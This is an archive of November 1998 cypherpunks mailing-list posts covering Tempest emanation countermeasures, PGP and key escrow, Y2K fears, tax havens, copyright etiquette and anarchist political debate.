Message-ID: <Pine.SOL.4.05.9811160735330.7807-100000@ultra1-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

BEATING THE TEMPEST: December 1998

<http://www.sciam.com/1998/1298issue/1298techbus4.html>

Just because you're paranoid doesn't mean they aren't out to get you. Most computer users would be startled to realize that somebody 
parked outside their home with the right kind of (very expensive) receiving equipment can read the data that appear on their computer 
screens. The receiver uses the monitor's radio emanations to reconstruct the screen's contents. The <A HREF="http://www.state.gov/">U.S. 
Department of State</A> and other organizations spend a fortune buying shielded hardware to defeat these signals, known as Tempest <A 
HREF="http://www.noradcorp.com/1tutor.htm">radiation</A>, after the code name for a government program aimed at tackling it.

Now Ross Anderson, a computer scientist at the University of Cambridge, and graduate student Markus 
G. Kuhn say they have developed methods for controlling Tempest radiation. What's different about their techniques is that they run in 
software, making them much cheaper and easier to deploy.

The story began, Anderson says, when Microsoft made its $20-million investment in Cambridge's 
computer science lab and said the company was particularly interested in ways to control software piracy. Most approaches call for some 
kind of copy protection; Anderson's idea was to design something that would enable detection of offenders rather than prohibit copying, 
which is a nuisance loathed by consumers. Their concept was to make computer screens broadcast the serial number of the software in use. 
In principle, properly equipped vans could patrol business districts looking for copyright infringements. In researching the broadcast 
idea, Anderson and Kuhn came up with fundamental discoveries about Tempest.

In particular, they observed that emissions relating to screen content are mostly found in the higher bands--above 30 megahertz, in the 
UHF and VHF bands. So altering those frequencies could change the Tempest radiation.

Anderson and his colleagues have fashioned a couple of prototypes that rely on different frequency-alteration methods. One of the lab's 
prototypes, built using a black-and-white video display capable of monitoring and receiving Tempest radiation, filters the top 
frequencies. As a result, the fonts become unreadable to the eavesdropping receiver. On-screen, the fonts look comfortably legible and 
nearly normal. Filtering text requires display software that supports grayscale representation of fonts, but most computers have this 
ability. Therefore, Anderson believes this technology could be easily built into existing machines, although the fonts' interference with 
graphics makes it more likely they would be included in a security product than in, say, a general operating system.

The second prototype takes advantage of the display technique known as dithering, a method of mixing extra colors from a limited palette 
based on the principle that if the dots that make up the display are small enough, the human eye will perceive the mix as a solid color. 
Given a monitor of today's high resolutions, the human eye cannot distinguish between a solid medium gray and a pattern of 
black-and-white pixels that adds up to the same gray. But the pattern of black and white is much easier for the snooping receiver to 
detect, one consequence being that the computer could be programmed to broadcast a different signal from the one that actually appears on 
the screen. The demonstration on display at Anderson's lab serves as a nice example, in which the word "Oxford" on the display appears as 
"Cambridge" on the receiver.

Aside from stemming electronic eavesdropping, these prototypes could open the way to new types of security attacks on computers, Anderson 
and Kuhn suggest. A virus could be designed to find and then broadcast information stored on a machine without a user's knowledge. The 
game of spy versus spy goes on.

WENDY M. GROSSMAN is a freelance writer based in London.

- ----------

yeah, yeah....it's old news, but a new article, and from 
"Unscientific Scamerican" no less.

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNlAdPZDw1ZsNz1IXAQFNNQf/Q23VtU0+xj6Cq4Eppm5TMqwd7DzE0k62
wR+hCqa7FXEEHbr+RSK7vdL3PmtaF6zUYAy9+Yn2C7lHnotVCRJ65hEIC+sDx5Rg
AdF9Y8wCiGUenAeFr54uSz8amo6aKXB6eoAFxJSwqp2xsQMqn9rGcEMOUOLi/OtO
b5Lj+e8gk9RREgjhPEIhHeVxqeJsKzB+A35FYr46T8du5+IYQyQucWGJEf/5zLga
Cr1N/8oPOXU4x+o0eUQmafvWNTyvuScu9+QdLyKxhgeRQyOe7U/TljNcp6kJs0q8
D+qlEADpzbKdm8uNAv0e7xRDe5J+CCdEKhUzs0A76TgXR7g6c+Czjg==
=KXvR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Mon, 16 Nov 1998 18:02:02 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: Re: Escrow - news
In-Reply-To: <E0zehqH-00004N-00@heaton.cl.cam.ac.uk>
Message-ID: <19981116092031.A3359@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



cc: added to cypherpunks

On Sat, Nov 14, 1998 at 03:42:26PM +0000, Ross Anderson wrote:

> On his most recent speaking tour of Europe, at which he promoted 
> PGP v 6, Phil Zimmermann assured us categorically that NAI had at
> his insistence withdrawn from the KRA.
> 
> It now appears that either (1) he lied to us (2) he was himself
> lied to by NAI management or (3) NAI has rejoined.

I assume you are refering to the meeting at Cambridge University that
you chaired.

My subjective impressions of that meeting were that PZ was certainly
sincere.  I seem to recall he told us that he was unware NAI had even
orginally been a member of KRA until he was telephoned by a journalist
in his car and was opposed to this.  Presumably this was before NAI
bought TIS and rejoined (?)

I would add an option

(4) PZ didn't know -- cockup not conspiracy

But all this leads to a lack of confidence in the future of the PGP product,
which is too precious to be left in the hands of one (American) company,
whose policy is in doubt.

I  am not currently convinced by their actions that NAI are
serious about strong crypto and I believe that a truly free and open
version of PGP (GPG?) would be superior.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    i would rather have my ignorance than another man's knowledge, because
i have got so much more of it.  -- mark twain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Tue, 17 Nov 1998 04:36:49 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: IP: Wired News: Y2Kaboom?
In-Reply-To: <199811161652.IAA02780@smtp.well.com>
Message-ID: <Pine.LNX.3.93.981116112930.6271A-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 16 Nov 1998, Declan McCullagh wrote:

# I hope that in the future, "Believer" would see fit not to distribute Wired
# News articles in full. Not only does it violate civil and criminal
# copyright law, but it's also just plain rude.

Hey Congress gets to insert the full test of articles into the Congressional
Record as much they want, why can't we? ;)


- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 17 Nov 1998 01:50:21 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: Wired News: Y2Kaboom?
In-Reply-To: <199811160253.SAA00989@netcom13.netcom.com>
Message-ID: <199811161652.IAA02780@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



I hope that in the future, "Believer" would see fit not to distribute Wired
News articles in full. Not only does it violate civil and criminal
copyright law, but it's also just plain rude.

-Declan


At 06:53 PM 11-15-98 -0800, Vladimir Z. Nuri wrote:
>
>From: believer@telepath.com
>Subject: IP: Wired News: Y2Kaboom?
>Date: Fri, 13 Nov 1998 02:27:52 -0600
>To: believer@telepath.com
>
>Source:  Wired News
>http://www.wired.com/news/news/politics/story/16217.html
>
>Y2Kaboom?
> by Declan McCullagh 
>
> 12:27 p.m.12.Nov.98.PST
> WASHINGTON -- America and Russia should
> shut down their nuclear arsenals rather than risk
> Armageddon because of Year 2000 glitches, a
> military research group says in a report released
> Thursday. 
>
> Y2K errors could cause the systems to go
> haywire, leading to erroneous early warning
> reports or even triggering an accidental launch of
> a nuclear missile, the British American Security
> Information Council warned in a 36-page report. 
>
> Both superpowers keep their arsenals in a
> constant state of readiness -- a Cold War-era
> strategy that could backfire with devastating
> results if the computer gremlins strike. 
>
> "If Y2K breakdowns were to produce inaccurate
> early-warning data, or if communications and
> command channels were to be compromised,
> the combination of hair-trigger force postures
> and Y2K failures could be disastrous," said the
> author of "The Bug in the Bomb: The Impact of
> the Year 2000 Problem on Nuclear Weapons." 
>
> Nuclear weapons systems are laced with
> embedded systems -- controlling functions such
> as ballistics and sensors -- that have not been
> declared free from Y2K worries, the report says.
> Most missles also keep track of time since the
> last monthly or yearly servicing, which could
> transform weapons into plutonium-packed
> paperweights if the systems shut down on 1
> January 2000. 
>
> A Defense Department official, who spoke on
> condition of anonymity, said nuclear weapons
> systems have received the Pentagon's full
> attention and will be in good shape. He added
> that military leaders are already discussing Y2K
> issues with their Russian counterparts. 
>
> Those assurances are not enough to allay the
> fears of Michael Kraig, the report's author. 
>
> "There are two problems together that make up
> one big problem: The sorry state of the
> [Russian] program and the fact that they don't
> know information about it," said Kraig, a BASIC
> fellow. "They're still committed to
> launch-on-warning and hair-trigger alert status.
> That, combined with the fact that their program
> is in such a sorry state, makes us worry." 
>
> BASIC lobbies for international agreements
> restricting arms sales and supports complete
> nuclear disarmament. 
>
>
> The Defense Department has been battling
> accusations that it lags behind other federal
> agencies in making Y2K repairs, something the
> agency's top officials are acutely aware of. 
>
> "I think we're probably going to be the poster
> child for failure," John Hamre, deputy secretary
> of defense, told Fortune 500 executives in July.
> "Nobody cares if the Park Services computers
> don't come on. OK? But what's going to happen
> if some do in the [Department of Defense]?" 
>
> The Clinton administration's September quarterly
> report on federal agencies says: "The
> Department of Defense has a massive Year
> 2000 challenge which must be accomplished on
> a tight schedule. The Department has improved
> its rate of progress in addressing the challenge,
> but the pace must be increased to meet
> government-wide milestones." 
>
> The administration's report says that as of this
> summer, 42 percent of the Pentagon's most vital
> systems -- 2,965 in all -- have been Y2K
> cleared. 
>
> But numbers alone don't reveal the complexity of
> the Defense Department's Y2K woes, Kraig
> argues. 
>
> "There are severe and recurring problems across
> the entire DOD Y2K remediation program,
> including ill-defined concepts and operating
> procedures, ad-hoc funding and spotty
> estimates for final costs, lax management,
> insufficient standards for declaring systems 'Y2K
> compliant,' insufficient contingency planning in
> case of Y2K-related failures, and poor
> inter-departmental communications," Kraig
> wrote. 
>
> In the preface, Paul Warnke, BASIC's president
> and chief arms-control negotiator under
> President Carter, says: "The only prudent
> course may be to de-alert those nuclear
> systems where date-related malfunctioning in
> associated command, control, and
> communications systems poses even a remote
> possibility of accidental launch." 
>
> Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.
>-----------------------
>NOTE: In accordance with Title 17 U.S.C. section 107, this material is
>distributed without profit or payment to those who have expressed a prior
>interest in receiving this information for non-profit research and
>educational purposes only. For more information go to:
>http://www.law.cornell.edu/uscode/17/107.shtml
>-----------------------
>
>
>****************************************************
>To subscribe or unsubscribe, email:
>     majordomo@majordomo.pobox.com
>with the message:
>     (un)subscribe ignition-point email@address
>
>or (un)subscribe ignition-point-digest email@address
>****************************************************
>www.telepath.com/believer
>****************************************************
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Mon, 16 Nov 1998 20:20:28 +0800
To: "Brown, R Ken" <frantz@netcom.com>
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F858D@MSX11002>
Message-ID: <19981116115915.A5751@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Nov 16, 1998 at 05:17:32AM -0600, Brown, R Ken wrote:
> Closest ciommon relative of hemp is of course hop  (*Humulus lupulus*
> IIRC) which is, as you all know, widely used to flavour beer. I believe
> it already has  some THC content, or something very similar.

lupulin ... I had a friend who claimed to get stoned off smoking hops
and hop extract.

There were inaccurate claims dating back to at least the 60s that hops
could be crossed with hemp to produce a psychoactive plant similar to
the recent Orange hoax.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    the chief value of money lies in the fact that one lives in a world
in which it is overestimated.  -- h. l. mencken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Mon, 16 Nov 1998 13:42:39 +0800
To: coderpunks@toad.com
Subject: 0/1 knapsack
Message-ID: <Pine.GSO.3.96.981116124934.27971A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Hey guys,

I found this in a web site.
|---v
A knapsack that holds a total....and N indivisible objects....
My quetion is does indivisible means that the object cannot be divided as
dividing a grain of rice? Does this imply I can divide an array of
integers but not the integers? 
--------------------------------------------


If I'm going to use 0/1 knapsack algo then I'll just place a tag on each
element let us say 1 for true and 0 for false? which ever element satisfy
the condition?

What is dynamic programming approach (wavefront calculation)? Is it with
the use of pointers? or
different concept? 


Thanks.

Bernie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 17 Nov 1998 06:01:15 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Attempt by UK govt to plug tax hole...
Message-ID: <199811162035.PAA21574@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>From Caribbean Week, business section, updated Nov. 15 1998 (?)

=================================================
Global initiatives present challenges to BVI

BRITISH VIRGIN ISLANDS - Proposed initiatives created for "combating
harmful preferential tax regimes" could present special challenges to offshore
financial centres such as the BVI, Chief Minister, Ralph O'Neal has told the
Legislative Council.

While the BVI Government has been cooperative with the international
community in its "ambitious attempts to create a new international standard,"
he said he welcomes the offer of the British Government to appoint a UK
financed consultancy to ascertain the full implication the proposed initiatives
will have on overseas territories.

Initiatives arose from recommendations made by the Organisation of
Economic Cooperative Development (OECD) as well as concerns expressed
by the European Union, and the group of seven major industrialized
countries, the G7. In September, a seminar was held to sensitise the overseas
territories to the attitude of the international community, the UK
Government's resolve to tackle harmful tax competition, and its commitment
to work with the overseas territories to ensure that their concerns were
factored into the ongoing dialogue on the harmful tax competition. Both the
Director of Financial Services and the Financial Secretary represented the
BVI.

Of the concerns noted by the Chief Minister were OCED initiatives to counter
the spread to tax havens and harmful preferential regimes, and the creation of
an OECD list which classifies many countries including the BVI and other UK
overseas territories as tax havens.

He further noted "the fact that Luxembourg and Switzerland, both members
of the OECD, could choose to abstain from adopting the report and from
cooperating on the initiatives but still not appear in the OECD black list" is
viewed by some persons as "proof of some hidden agenda by ... the
industrialised world to reduce the attractiveness of offshore financial centres
for legitimate cross-border business."

"Our expectations of the new Labour Government are high. All we ask ... is
to help us to help ourselves and to ensure that the competition for cross
border financial services occurs on a level playing field," he added.

A special public sector/private sector task force has been commissioned to
brainstorm and develop the territory's response to the proposals. The Director
of Financial Services is the chairman.

Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:0xC58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:0x5B51964D:152ACCBCD4A481B0 254011193237822C
PGP ID:0x6CBA71F7:485888E9FD68415A2945 ACCB366D38486CBA71F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Tue, 17 Nov 1998 07:24:40 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Attempt by UK govt to plug tax hole...
In-Reply-To: <199811162035.PAA21574@cti06.citenet.net>
Message-ID: <Pine.SOL.3.91.981116153116.4638E-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



> =================================================
> Global initiatives present challenges to BVI
> 
> BRITISH VIRGIN ISLANDS - Proposed initiatives created for "combating
> harmful preferential tax regimes"

Man, that is what I call a loaded statement.  It speaks volumes.

> 
> While the BVI Government has been cooperative with the international
> community in its "ambitious attempts to create a new international standard,"

First I heard about this.  Is this some sort of NWO move to "harmonize"
tax levels worldwide so that no one can escape their clutches?  Someone
should tell New Zealand, which apparently is rescinding income taxes
altogether after 2000.

> he said he welcomes the offer of the British Government to appoint a UK
> financed consultancy to ascertain the full implication the proposed initiatives
> will have on overseas territories.

My guess is that the Cayman Islands are going to buy some political
representation (as if they already haven't)

> 
> Initiatives arose from recommendations made by the Organisation of
> Economic Cooperative Development (OECD) as well as concerns expressed
> by the European Union, and the group of seven major industrialized
> countries, the G7. In September, a seminar was held to sensitise the overseas
> territories to the attitude of the international community, the UK
> Government's resolve to tackle harmful tax competition

"Harmful tax competition".  "Sensitise".  ROTFLOL.

 
> Of the concerns noted by the Chief Minister were OCED initiatives to counter
> the spread to tax havens and harmful preferential regimes, and the creation of
> an OECD list which classifies many countries including the BVI and other UK
> overseas territories as tax havens.

Countering tax havens with what?  Gunboat diplomacy?  Tax the hell out
of your citizens or we bomb you!

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 17 Nov 1998 08:48:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Feds Assault the Free Press
Message-ID: <199811170017.QAA28789@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Feds Assault the Free Press
Date: Mon, 16 Nov 1998 10:34:40 -0600
To: believer@telepath.com

Source:  Insight Magazine (published by Washington Times)

Feds Assault the Free Press

 By Kelly Patricia O'Meara

 A journalist and his wife have drawn the wrath of
 federal law enforcement. Their 'crime': allegedly
 removing a tiny piece of TWA Flight 800 wreckage
 for independent study.

It was FBI Special Agent James Kinsley who insisted the
 accused subjects be handcuffed and driven in separate
 FBI vehicles to U.S. District Court in Uniondale, N.Y.
 Secured by heavy manacles, the prisoners were paraded
 before media eager to get a look at the husband and wife team
 charged with the alleged crime of stealing evidence from the
 hangar where the wreckage of doomed TWA Flight 800 is
 being assembled. 
 
. . . . But something was very wrong. The prisoners were Jim
 Sanders, author of nonfiction books including The Downing of
 TWA Flight 800, and his petite, soft-spoken wife Liz, a retired
 flight-attendant trainer for TWA. The two spent hours in
 holding cells under the court house not far from where the 747
 exploded in a deadly fireball on July 17, l996, before being
 allowed to plead not guilty to the government's charges. If
 convicted, this couple, who just celebrated their silver wedding
 anniversary, face up to 10 years in prison.

TO ACCESS COMPLETE ARTICLE:
http://www.insightmag.com/articles/story3.html

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 17 Nov 1998 08:51:23 +0800
To: cypherpunks@cyberpass.net
Subject: IP: 61% of IT Professionals Plan to Pull Money from Banks
Message-ID: <199811170017.QAA28800@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: 61% of IT Professionals Plan to Pull Money from Banks
Date: Mon, 16 Nov 1998 14:05:20 -0600
To: believer@telepath.com

Source:  http://www.garynorth.com/y2k/detail_.cfm/3072

Category:  Programmers'_Views
Date:  1998-11-13 17:53:32
Subject:  61% of IT Professionals Plan to Pull Money from Banks
Link:  http://year2000.dci.com/articles/1998/11/11poll.htm

 Comment: 

 In an on-line poll of over 6,000 IT professionals (high), 61% plan to
take cash out of their banks. 

 This is from DCI (Nov. 11). 

 * * * * * * * * 

 . . . Almost eighty percent are taking steps to minimize the impact of
the Millennium Bug : 62.4 percent plan to avoid traveling by plane,  61.5
percent will withdraw money from the bank, and 58.6 percent  will purchase
extra supplies in case of a shortage.  

Link:   http://year2000.dci.com/articles/1998/11/11poll.htm

November 11, 1998
Pointing the Y2K Finger

An online Year 2000 poll conducted recently by ZD Network News and The
Harris Poll Online reveals a mixture of confidence and prudent preparation
among a group of Y2K-savvy professionals. 

Of the 6,320 people who filled out the survey, 56.8 percent identified
themselves as full-or part-time I.T. professionals. Not surprisingly, 84
percent claimed to have a "good" or "complete" understanding of the Year
2000 problem. More than half are clear on who is to blame.

Sixty-one percent of respondents believe those who build, sell and use
computers, along with business leaders, are responsible for the Year 2000
problem. And don't look to place the blame on Uncle Sam. Only 23.6 percent
of those surveyed say they will blame the government in the event of Y2K
disruptions.

Happily, the news isn't all bad. A large percentage of respondents (75.2
percent) said their companies have taken steps toward Y2K compliance.
Sixty-two percent believe their company will be able to make the necessary
changes and create contingency plans in time to meet the Jan. 1st deadline.
A healthy 84.8 percent of respondents whose companies are actively working
on Y2K believe compliance goals will be reached. 

However, only 24.1 percent reported that the process was already complete.  

Over half of those surveyed feel they are more concerned about Y2K than the
majority of people. But panic has yet to set in. When asked to predict the
impact of Y2K only 21.3 percent said they thought it would be "very
serious." Almost two-thirds believe the results of Y2K will fall somewhere
in the middle ground between "negligible effects" and "doomsday." 

Respondents are taking precautions nonetheless. Roughly three-fourths of
survey participants have checked their PCs for Y2K compliance. Almost
eighty percent are taking steps to minimize the impact of the Millennium
Bug : 62.4 percent plan to avoid traveling by plane, 61.5 percent will
withdraw money from the bank, and 58.6 percent will purchase extra supplies
in case of a shortage.

 (c) Copyright 1998 by DCI (978) 470-3880


-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 17 Nov 1998 06:21:22 +0800
To: b!X <bix@geekforce.org>
Subject: Re: IP: Wired News: Y2Kaboom?
In-Reply-To: <199811161652.IAA02780@smtp.well.com>
Message-ID: <199811162120.NAA28775@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



The fact that one entity is enaging in appropriate behavior does not excuse
the rest.

-Declan


At 11:30 AM 11-16-98 -0800, b!X wrote:
>On Mon, 16 Nov 1998, Declan McCullagh wrote:
>
># I hope that in the future, "Believer" would see fit not to distribute Wired
># News articles in full. Not only does it violate civil and criminal
># copyright law, but it's also just plain rude.
>
>Hey Congress gets to insert the full test of articles into the Congressional
>Record as much they want, why can't we? ;)
>
>
>- b!X (Guerrilla Techno-fetishist @ GEEK Force)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 17 Nov 1998 14:06:11 +0800
To: Steve Mynott <frantz@netcom.com>
Subject: Re: SIGH... NOT!! THC tinted oranges
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F858D@MSX11002>
Message-ID: <3.0.5.32.19981116162959.008a1dd0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:59 AM 11/16/98 +0000, Steve Mynott wrote:
>lupulin ... I had a friend who claimed to get stoned off smoking hops
>and hop extract.

Back in the 60s (well, 70s) we could get stoned smoking just about anything;
didn't matter if it was psychoactive or not, as long as you really 
_wanted_ to believe you'd get stoned  from it. :-)  I mean, if it worked
with banana peels, it'd work with just about anything...

On the other hand, an acquaintance of mine and some of his druggie friends
decided to try smoking caffeine pills to see what would happen.  Once. :-)
You do not want to try this.  He said it hits you with all the bad
caffeine side effects, all at once.

>There were inaccurate claims dating back to at least the 60s that hops
>could be crossed with hemp to produce a psychoactive plant similar to
>the recent Orange hoax.

I have heard of people grafting hop vines onto cannabis roots,
which can ostensibly get THC into the hops while looking like an
innocent non-contraband plant.  
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Elliott <melliott@ncsa.uiuc.edu>
Date: Tue, 17 Nov 1998 07:17:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Wired News: Y2Kaboom?
In-Reply-To: <Pine.LNX.3.93.981116112930.6271A-100000@millennium-cafe.co m>
Message-ID: <v04102f02b27658214fdc@[141.142.103.240]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:20 PM -0500 11/16/98, Declan McCullagh wrote:
> The fact that one entity is enaging in appropriate behavior does not excuse
> the rest.

I think it is appropriate.  Take "Believer" to court and hope I don't 
happen to be sitting on the jury.


Matt <mailto:melliott@ncsa.uiuc.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 17 Nov 1998 06:43:39 +0800
To: b!X <bix@geekforce.org>
Subject: Re: IP: Wired News: Y2Kaboom?
Message-ID: <4.0.2.19981116163420.00af85b0@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Make that "inappropriate" behavior.

>The fact that one entity is enaging in appropriate behavior does not
excuse the >rest.

-Declan


At 11:30 AM 11-16-98 -0800, b!X wrote:
>On Mon, 16 Nov 1998, Declan McCullagh wrote:
>
># I hope that in the future, "Believer" would see fit not to distribute Wired
># News articles in full. Not only does it violate civil and criminal
># copyright law, but it's also just plain rude.
>
>Hey Congress gets to insert the full test of articles into the Congressional
>Record as much they want, why can't we? ;)
>
>
>- b!X (Guerrilla Techno-fetishist @ GEEK Force)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 17 Nov 1998 09:23:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Non Explosive Weapons
Message-ID: <3650C67B.358@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



John,

NEW is such a goddamned brilliant acronym.

Now I'll get in trouble if I start making *major cojones capacitors*.
Mineral oil will become a controlled substance if possessed in
quantities greater than 1/2 pt or used in any manner other than that
described on the label. Vacuum pumps will be contraband. Like ROM
burners.

Danzig...
> Above all, we should stop thinking and organizing in terms of
> anachronistic distinctions between "here" and "abroad," between
> "military" and "civilian," among "crime," "war" and "natural 
> occurrence." Nonexplosive weapons erode all such boundaries. 
>
> This does not require the militarization of America. The protections 
> guaranteed in the Constitution against arrest and investigation
> can remain strong. 
>
Tune in next week when: ((( A == B ) && ( A != B )) == TRUE ) or how to
babble BULLSHIT from a position of power. Either dangerous or stupid.
Who pays his weekly check?

I can't help but think that these guys are just looking for a new "main
gig in life" that lets them shorten the commute between home and the war
zone. Why don't they go start a war somewhere else?

Here are some amusing sites - 
	http://www.ntcip.org/
	http://www.tcip.org/
Yet another infrastructure system getting ready for the hackers. Won't
even be able to trust traffic lights soon. Yet another excuse for
insurance rate changes.

I guess I'd prefer automation with fewer features but better reliability
and security to soldiers in the streets. No luck there though, too
practical, it would be too inexpensive and what would we do with all
those soldiers?

Mike

The Danzig's Dictionary
good      == bad
there     == here
imaginary == real
speech    == threat
thought   == terrorism
civilian  == suspect
suspect   == convict
yours     == ours
ours      == mine
mine      == mineallmine

Not up to Bierce specs, sadly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 17 Nov 1998 14:00:46 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question about anarchic systems and natural disasters (fwd)
In-Reply-To: <199811161315.HAA10512@einstein.ssz.com>
Message-ID: <3.0.5.32.19981116170417.008a3750@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:15 AM 11/16/98 -0600, Jim Choate wrote:
>> I see three aspects in which government affects disaster aid in this case.
>[remainder deleted]
>The question was how would an anarchic system work in this respect, not how
>do governments, relief organizations, and the general public act now.

Wasn't explicit enough for you, even with comparisons in the sections?
Let's try again, then, deleting most of the how-it-works-today parts,
and flagging the new material with ++

0) <governments as distribution channels>
	If Central America were anarchist, the road money would go to
	road-maintenance companies or collectives, and the rest would
	probably be handled between by the Catholic Church and other
	international charities, plus by the local charities which would
	be bigger because they'd be doing jobs governments do know.

1) <Real charities have to ask for money, governments can steal it fast>
	++ They'd still have to ask, and people would be more willing to give,
	++ because they know it's their job, and because they've got
	++ more money that they're not wasting on governments.

	Also, in an anarchist society, charities would generally keep
	a reasonable amount of money on hand for emergencies like this,
	larger than they do today, but smaller than governments' slush funds.

2) <synergy between the disaster relief and military adventurism>
	Even purely defensive military forces aren't directly
	contributing to society sitting around idle - even a
	peaceful anarchist society needs some protection against
	invaders, though there are more efficient and safer approaches than
	a standing army - and even though they'd be smaller,
	they can still be helpful.

	++ But yes, this part may be easier in a collectivist militarist society
	++ than in a peaceful anarchist society.  On the other hand,
	++ even without socialized roadbuilding, there'll still be 
	++ road-builders who can be hired, and there may be more pilots
	++ if transportation isn't a licensed activity, though
	++ insurance companies (or self-insurance) reduce this effect a bit.
	++ Also, without government-subsidized uneconomical roadbuilding in the 
	++ National Forests, there'd be more business for non-road-based
	++ transportation of logging in remote forests, so technology
	++ for doing that would be more developed.  My guess is we'd have a
	++ lot more blimps than today, partly as communications platforms,
	++ though it really is faster to haul Hueys somewhere in a hurry.

3) ++ Better economies in Central America
	++ I missed this entirely in my first analysis - part of the problem
	++ has been the weakness of the Central American economies which
	++ makes it harder for them to do their own relief efforts.
	++ So much of that area is in bad shape because of US-supported
	++ military regimes, either dictatorships and juntas, or places like
	++ Nicaragua where the only way to get rid of the Somoza dictators
	++ was for a bunch of Commies to overthrow them, which not only had
	++ the devastation of a civil war and the inherent stupidity and
